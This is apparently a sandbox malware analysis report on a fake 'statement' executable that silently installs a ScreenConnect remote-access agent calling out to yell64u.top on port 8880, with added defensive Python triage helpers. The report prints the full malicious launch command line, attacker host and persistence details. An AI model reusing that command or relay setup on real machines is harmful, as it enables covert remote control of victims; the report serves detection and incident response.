                              Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.Compression.dll
                              Source: C:\Users\user\Desktop\statmentt.exe TID: 7428 | Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe TID: 7840 | Thread sleep count: 40 > 30
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe TID: 8036 | Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Last function: Thread delayed
                              Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\statmentt.exe | Thread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Thread delayed: delay time: 922337203685477
                              Source: setup.msi.0.dr | Binary or memory string: VMCi-
                              Source: ScreenConnect.ClientService.exe, 00000007.00000002.3053324699.0000000004F24000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Windows\System32\msiexec.exe | Process information queried: ProcessInformation
                              Source: C:\Users\user\Desktop\statmentt.exe | Process token adjusted: Debug
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Process token adjusted: Debug
                              Source: C:\Users\user\Desktop\statmentt.exe | Memory allocated: page read and write | page guard

                              HIPS / PFW / Operating System Protection Evasion

Source: 0.2.statmentt.exe.5880000.2.raw.unpack, NativeLibrary.cs | Reference to suspicious API methods: LoadLibrary(type, assemblyTypeHint)
Source: 0.2.statmentt.exe.5910000.5.raw.unpack, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: 0.2.statmentt.exe.5910000.5.raw.unpack, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: 0.2.statmentt.exe.5910000.5.raw.unpack, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
Source: 0.2.statmentt.exe.5910000.5.raw.unpack, WindowsExtensions.cs | Reference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
Source: 0.0.statmentt.exe.11078f8.5.raw.unpack, Program.cs | Reference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
Source: C:\Users\user\Desktop\statmentt.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
Source: unknown | Process created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (de5851ad6e374ce3)\screenconnect.clientservice.exe" "?e=access&y=guest&h=yell64u.top&p=8880&s=07e04c0f-eabe-4658-9ea3-184f7035898e&k=bgiaaackaabsu0exaagaaaeaaqdfk%2fbbpi2y%2fu64inmnualvsinhikj3qixef2eblhktkmb9wafgho8pwjl0lvyg9kgvgb%2fbbr7p8upybqqwjmt2zg9vyagxlcjy%2fd8w0%2b7tfbgg8gffcjoob3tupnzbetnvs8%2bybotmzzsmg6ijynblxj1gtcahumwr1u8jkfxsyvpzrxohbr31dmibtzi1nunryf8xa6qxsktbm1h0aqgbzr6fzuzymqekrjktwq2%2fxup3dlz4en6bz1k0onlkviz5vhj3h597ijpgkjlbhftfc4t%2btt%2bncv6zqw83iwwtzxibtxf7nmuvq0n4ff2lkmh5flu07mqw%2fy38%2b5mo41xa&c=it&c=&c=&c=it%20team&c=&c=&c=&c="
Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1837493659.00000000000A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr | Binary or memory string: Progman
Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1837493659.00000000000A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr | Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\statmentt.exe | Queries volume information (VolumeInformation): C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information (VolumeInformation): C:\
Source: C:\Windows\System32\msiexec.exe | Queries volume information (VolumeInformation): C:\
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information (VolumeInformation): C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.WindowsInstaller.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information (VolumeInformation): C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.InstallerActions.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information (VolumeInformation): C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.Core.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information (VolumeInformation): C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.Windows.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information (VolumeInformation): C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Queries volume information (VolumeInformation): C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Queries volume information (VolumeInformation): C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Queries volume information (VolumeInformation): C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Queries volume information (VolumeInformation): C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Queries volume information (VolumeInformation): C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Queries volume information (VolumeInformation): C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Queries volume information (VolumeInformation): C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Queries volume information (VolumeInformation): C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Queries volume information (VolumeInformation): C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Queries volume information (VolumeInformation): C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Queries volume information (VolumeInformation): C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Queries volume information (VolumeInformation): C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Queries volume information (VolumeInformation): C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Queries volume information (VolumeInformation): C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Queries volume information (VolumeInformation): C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Queries volume information (VolumeInformation): C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Queries volume information (VolumeInformation): C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Queries volume information (VolumeInformation): C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Queries volume information (VolumeInformation): C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Queries volume information (VolumeInformation): C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function 7_2_058304EC: CreateNamedPipeW
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function 7_2_01904D30: RtlGetVersion
Source: C:\Users\user\Desktop\statmentt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
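The ScreenConnect.ClientService.exe command line recorded in the process-creation row above is the most useful artifact in this section: it carries the relay host (h=yell64u.top), relay port (p=8880), session GUID (s=), session type (e=access, an unattended-access agent rather than a one-off support session), eight custom properties (c=, here "it" and "it team") and a key blob (k=), which in my reading is the server's public key. The following Python triage helper is an added example, not Joe Sandbox or ConnectWise code. It parses that exact recorded line and flags the relay parameters against a constructed allowlist and a set of expected ports (8041 is the product default relay port, 443 is common for internet-facing relays; both are assumptions to adjust per deployment). One caveat the report itself shows: the sandbox recorded the command line in lowercase, which destroys the case of the base64 key blob, so the helper only checks that k still case-folds to the header of a CAPI PUBLICKEYBLOB for a 2048-bit RSA1 key (base64 "BgIAAACkAABSU0Ex...") and does not try to decode it.

```python
"""Parse and triage a ScreenConnect client launch command line.

Added example, not Joe Sandbox or ConnectWise code. OBSERVED_CMDLINE is the line the
report recorded; the allowlist and the expected-port set are constructed assumptions.
"""
import re
from urllib.parse import parse_qsl

# Recorded by the sandbox in lowercase; that is why the key blob cannot be base64-decoded here.
OBSERVED_CMDLINE = (
    r'"c:\program files (x86)\screenconnect client (de5851ad6e374ce3)\screenconnect.clientservice.exe" '
    r'"?e=access&y=guest&h=yell64u.top&p=8880&s=07e04c0f-eabe-4658-9ea3-184f7035898e'
    r'&k=bgiaaackaabsu0exaagaaaeaaqdfk%2fbbpi2y%2fu64inmnualvsinhikj3qixef2eblhktkmb9wafgho8pwjl0lvyg9kgvgb'
    r'%2fbbr7p8upybqqwjmt2zg9vyagxlcjy%2fd8w0%2b7tfbgg8gffcjoob3tupnzbetnvs8%2bybotmzzsmg6ijynblxj1gtcahumwr1u8'
    r'jkfxsyvpzrxohbr31dmibtzi1nunryf8xa6qxsktbm1h0aqgbzr6fzuzymqekrjktwq2%2fxup3dlz4en6bz1k0onlkviz5vhj3h597'
    r'ijpgkjlbhftfc4t%2btt%2bncv6zqw83iwwtzxibtxf7nmuvq0n4ff2lkmh5flu07mqw%2fy38%2b5mo41xa'
    r'&c=it&c=&c=&c=it%20team&c=&c=&c=&c="'
)

# base64 of the CAPI BLOBHEADER plus RSAPUBKEY magic of a 2048-bit RSA public key:
# 06 02 00 00 00 A4 00 00 'R' 'S' 'A' '1'  ->  "BgIAAACkAABSU0Ex"
RSA1_PUBLICKEYBLOB_B64_PREFIX = "BgIAAACkAABSU0Ex"

# Constructed allowlist of relay hosts this (hypothetical) organisation operates.
TRUSTED_RELAY_HOSTS = {"support.example.com"}
# 8041 is the product default relay port, 443 a common internet-facing choice (assumption).
EXPECTED_RELAY_PORTS = {443, 8041}


def extract_query(cmdline: str) -> str:
    """Return the quoted '?...' argument of the ClientService command line without the '?'."""
    match = re.search(r'"(\?[^"]*)"', cmdline)
    if not match:
        raise ValueError("no ScreenConnect parameter block in command line")
    return match.group(1)[1:]


def parse_launch_params(cmdline: str) -> dict:
    """Decode the launch parameters; 'c' repeats (custom properties) so it is kept as a list."""
    multi = {}
    for key, value in parse_qsl(extract_query(cmdline), keep_blank_values=True):
        multi.setdefault(key, []).append(value)

    def first(key):
        return multi[key][0] if key in multi else None

    return {
        "session_type": first("e"),   # support / meeting / access
        "process_type": first("y"),   # guest = the remote-controlled endpoint
        "relay_host": first("h"),
        "relay_port": int(first("p")) if first("p") else None,
        "session_id": first("s"),
        "key_blob": first("k") or "",
        "custom_properties": multi.get("c", []),
    }


def key_blob_is_rsa1_publickeyblob(key_blob: str) -> bool:
    """Case-insensitive header check; case-insensitive only because the sandbox lowercased the line."""
    return key_blob.lower().startswith(RSA1_PUBLICKEYBLOB_B64_PREFIX.lower())


def triage(cmdline: str, trusted_hosts=TRUSTED_RELAY_HOSTS, expected_ports=EXPECTED_RELAY_PORTS) -> dict:
    """Parsed parameters plus a list of findings a responder would act on."""
    params = parse_launch_params(cmdline)
    findings = []
    host = (params["relay_host"] or "").lower()
    if host and host not in {h.lower() for h in trusted_hosts}:
        findings.append(f"relay host {host} is not an approved ScreenConnect relay")
    if params["relay_port"] is not None and params["relay_port"] not in expected_ports:
        findings.append(f"relay port {params['relay_port']} is not an expected relay port")
    if params["session_type"] == "access":
        findings.append("session type 'access': unattended persistent agent, not a one-off support session")
    if not key_blob_is_rsa1_publickeyblob(params["key_blob"]):
        findings.append("key blob does not look like an RSA1 PUBLICKEYBLOB")
    params["findings"] = findings
    return params


if __name__ == "__main__":
    result = triage(OBSERVED_CMDLINE)
    print(f"relay {result['relay_host']}:{result['relay_port']} session {result['session_id']}")
    for finding in result["findings"]:
        print(" -", finding)
```

Run against the recorded line this yields three findings (untrusted relay host, non-default port 8880, unattended access session) and no finding on the key blob. The same parser works on a live Sysmon event ID 1 or a 4688 command line, where the blob keeps its case and can be base64-decoded if the server key needs to be pivoted on.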

                              Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\msiexec.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
Source: Yara match | File source: statmentt.exe, type: SAMPLE
Source: Yara match | File source: 0.2.statmentt.exe.5b10000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.ScreenConnect.WindowsClient.exe.24bfa20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.ScreenConnect.WindowsClient.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.statmentt.exe.c85db8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.statmentt.exe.5b10000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.statmentt.exe.c5c3d8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.statmentt.exe.bd63d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.ScreenConnect.WindowsClient.exe.32efa60.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.statmentt.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1802003851.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.1837493659.00000000000A2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3027011781.0000000002441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1770182468.0000000000BD6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1785575924.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1889347392.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: statmentt.exe PID: 7408, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7632, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7856, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 8012, type: MEMORYSTR
Source: Yara match | File source: C:\Config.Msi\68f19a.rbs, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, type: DROPPED
Source: Yara match | File source: C:\Windows\Installer\MSIF458.tmp, type: DROPPED
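The first row of this section records the installer writing the LSA "Authentication Packages" value, and the dropped-file list further down includes ScreenConnect.WindowsAuthenticationPackage.dll, so this is most likely ScreenConnect registering its own authentication package, which LSASS loads at the next boot (ATT&CK T1547.002). Whether that is acceptable depends entirely on whether the install was sanctioned; the check a responder wants is the value's content against the stock baseline, which on a default Windows 10 install is the single entry msv1_0. The following Python is an added example, not Joe Sandbox or ConnectWise code. The multi-string it falls back to when not run on Windows is constructed, and the exact package name ScreenConnect registers is not given in the report, so it is not assumed. Note the report logs the resolved path ControlSet001; on a live host the same key is read through CurrentControlSet.

```python
r"""Baseline check for the LSA 'Authentication Packages' value.

Added example, not Joe Sandbox or ConnectWise code. The report shows msiexec.exe writing
HKLM\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages; a live system is queried through
CurrentControlSet, an alias of the active control set, which resolves to the same key.
"""
import sys

# Content of this REG_MULTI_SZ value on a stock Windows 10 install.
DEFAULT_AUTH_PACKAGES = ("msv1_0",)


def unexpected_auth_packages(values, baseline=DEFAULT_AUTH_PACKAGES):
    """Entries of the multi-string value that are not in the baseline (case-insensitive, blanks ignored)."""
    known = {entry.lower() for entry in baseline}
    return [value for value in values if value and value.lower() not in known]


def package_dll_path(name, system32=r"C:\Windows\System32"):
    r"""Where LSA is expected to load the package from: bare names resolve to <System32>\<name>.dll."""
    if "\\" in name:
        return name
    if not name.lower().endswith(".dll"):
        name += ".dll"
    return system32 + "\\" + name


def read_live_auth_packages():
    """Read the value from the running system (Windows only)."""
    import winreg  # imported here so the pure functions above run on any platform
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Control\Lsa") as key:
        value, kind = winreg.QueryValueEx(key, "Authentication Packages")
    if kind != winreg.REG_MULTI_SZ:
        raise TypeError(f"unexpected registry value type {kind}")
    return list(value)


if __name__ == "__main__":
    if sys.platform == "win32":
        packages = read_live_auth_packages()
    else:
        # Constructed sample of a modified value; the real name ScreenConnect writes is not in the report.
        packages = ["msv1_0", "ScreenConnect.WindowsAuthenticationPackage"]
    for extra in unexpected_auth_packages(packages):
        print(f"non-default LSA authentication package: {extra} -> {package_dll_path(extra)}")
```

Each flagged name should be checked against the DLL actually present at the resolved path (signer, hash, install time), and the same comparison is worth repeating for the neighbouring "Security Packages" value, which the report does not show being touched.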
MITRE ATT&CK matrix, techniques with observed signature hits (hit count in parentheses). The tactics Reconnaissance, Resource Development, Credential Access, Lateral Movement, Exfiltration and Impact had no observed technique; the remaining cells of the matrix only list techniques without a hit.

Initial Access: Valid Accounts (1); Replication Through Removable Media (1)
Execution: Windows Management Instrumentation (31); Command and Scripting Interpreter (12); Native API (1)
Persistence: Windows Service (2); DLL Side-Loading (1); DLL Search Order Hijacking (1); Component Object Model Hijacking (1); Valid Accounts (1); Bootkit (1)
Privilege Escalation: Process Injection (13); Windows Service (2); DLL Side-Loading (1); DLL Search Order Hijacking (1); Component Object Model Hijacking (1); Valid Accounts (1); Access Token Manipulation (1)
Defense Evasion: Masquerading (122); Virtualization/Sandbox Evasion (51); Process Injection (13); Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); Software Packing (1); DLL Side-Loading (1); DLL Search Order Hijacking (1); File Deletion (1); Valid Accounts (1); Access Token Manipulation (1); Hidden Users (1); Bootkit (1); Rundll32 (1)
Discovery: Virtualization/Sandbox Evasion (51); System Information Discovery (45); Security Software Discovery (21); Peripheral Device Discovery (11); Process Discovery (2); File and Directory Discovery (1)
Collection: Archive Collected Data (11)
Command and Control: Encrypted Channel (2); Non-Standard Port (1); Non-Application Layer Protocol (1); Application Layer Protocol (1)
Behavior graph (ID 1578432, sample statmentt.exe, start date 19/12/2024, architecture WINDOWS, score 48). Numbers in brackets are the graph's per-process counters (created registry values, created files).

Analysis start
  DNS: yell64u.top
  Signatures: Multi AV Scanner detection for submitted file; .NET source code contains potential unpacker; .NET source code references suspicious native API functions; 5 other signatures
  +-- msiexec.exe [94 51]
  |     Dropped: ScreenConnect.Wind...dentialProvider.dll (PE32+); C:\...\ScreenConnect.WindowsClient.exe (PE32); C:\...\ScreenConnect.ClientService.exe (PE32); 10 other files (1 malicious)
  |     Signatures: Enables network access during safeboot for specific services; Modifies security policies related information
  |     +-- msiexec.exe
  |     |     +-- rundll32.exe [11]
  |     |           Dropped: C:\Users\user\...\ScreenConnect.Windows.dll (PE32); C:\...\ScreenConnect.InstallerActions.dll (PE32); C:\Users\user\...\ScreenConnect.Core.dll (PE32); 4 other files (none is malicious)
  |     |           Signatures: Contains functionality to hide user accounts
  |     +-- msiexec.exe [1]
  |     +-- msiexec.exe
  +-- ScreenConnect.ClientService.exe [2 5]
  |     Network: yell64u.top 85.239.34.190, local port 49731 to remote port 8880, ASN RAINBOW-HK Rainbownetworklimited HK, Russian Federation
  |     Signatures: Reads the Security eventlog; Reads the System eventlog
  |     +-- ScreenConnect.WindowsClient.exe [3]
  |     |     Signatures: Creates files in the system32 config directory; Contains functionality to hide user accounts
  |     +-- ScreenConnect.WindowsClient.exe [2]
  +-- statmentt.exe [5]
        Dropped: C:\Users\user\AppData\...\statmentt.exe.log (ASCII)
        Signatures: Contains functionality to hide user accounts
        +-- msiexec.exe [6]
              Dropped: C:\Users\user\AppData\Local\...\MSIEC0B.tmp (PE32)

Antivirus detection, initial sample
Source | Detection | Scanner | Label
statmentt.exe | 21% | ReversingLabs | Win32.PUA.ConnectWise

Antivirus detection, dropped files (every entry: 0%, ReversingLabs, no label)
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe
C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp
C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.Compression.Cab.dll
C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.Compression.dll
C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.WindowsInstaller.dll
C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.Core.dll
C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.InstallerActions.dll
C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.Windows.dll
C:\Windows\Installer\MSIF488.tmp
C:\Windows\Installer\MSIF739.tmp

No Antivirus matches
No Antivirus matches
No Antivirus matches
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
yell64u.top | 85.239.34.190 | true | true | | unknown
URLs (Name | Sources | Malicious | Antivirus Detection | Reputation)
http://wixtoolset.org/releases/
  Sources: rundll32.exe, 00000004.00000003.1797343933.0000000004203000.00000004.00000020.00020000.00000000.sdmp; rundll32.exe, 00000004.00000003.1797154534.000000000437C000.00000004.00000020.00020000.00000000.sdmp; rundll32.exe, 00000004.00000003.1797154534.000000000430D000.00000004.00000020.00020000.00000000.sdmp; Microsoft.Deployment.WindowsInstaller.dll.4.dr; Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr; Microsoft.Deployment.Compression.dll.4.dr; Microsoft.Deployment.Compression.Cab.dll.4.dr
  Malicious: false | Antivirus Detection: | Reputation: high
http://wixtoolset.org/news/
  Sources: rundll32.exe, 00000004.00000003.1797343933.0000000004203000.00000004.00000020.00020000.00000000.sdmp; rundll32.exe, 00000004.00000003.1797154534.000000000437C000.00000004.00000020.00020000.00000000.sdmp; rundll32.exe, 00000004.00000003.1797154534.000000000430D000.00000004.00000020.00020000.00000000.sdmp; Microsoft.Deployment.WindowsInstaller.dll.4.dr; Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr; Microsoft.Deployment.Compression.dll.4.dr; Microsoft.Deployment.Compression.Cab.dll.4.dr
  Malicious: false | Antivirus Detection: | Reputation: high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
  Sources: ScreenConnect.ClientService.exe, 00000007.00000002.3028562442.0000000001C7A000.00000004.00000800.00020000.00000000.sdmp; ScreenConnect.WindowsClient.exe, 00000009.00000002.1889347392.0000000003271000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus Detection: | Reputation: high
http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v (string as found in memory)
